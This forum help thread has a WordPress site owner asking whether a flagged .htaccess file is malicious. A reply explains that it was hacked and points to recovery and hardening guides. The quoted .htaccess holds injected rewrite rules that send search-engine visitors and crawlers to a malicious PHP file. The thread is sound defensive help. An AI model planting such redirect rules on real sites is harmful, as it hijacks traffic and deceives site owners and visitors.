Godaddy flagged my /html/.htaccess file as possible malware.
Is this malicious? Fwiw, it also flagged wp-currentver.php as possible malware.
My site looks fine, appears to be functioning fine.
RewriteEngine On
RewriteCond %{ENV:REDIRECT_STATUS} 200
RewriteRule ^ - [L]
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^([^/]*)/$ /wp-currentver.php?p=$1 [L]
# BEGIN WordPress
# END WordPress
You got hacked.
Those are redirects that detect if someone is coming through Google search results with Google as a referrer; the standard WordPress (non-Multisite) rewrite block is at https://codex.wordpress.org/htaccess i.e.:
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
And the file wp-currentver.php is malicious and not WordPress core. Also see https://productforums.google.com/forum/#!topic/webmasters/f4Cw1k1-j6g
Carefully follow FAQ My site was hacked - WordPress Codex.
Find a more secure host.
Then take a look at the recommended security measures in Hardening WordPress - WordPress Codex and Brute Force Attacks - WordPress Codex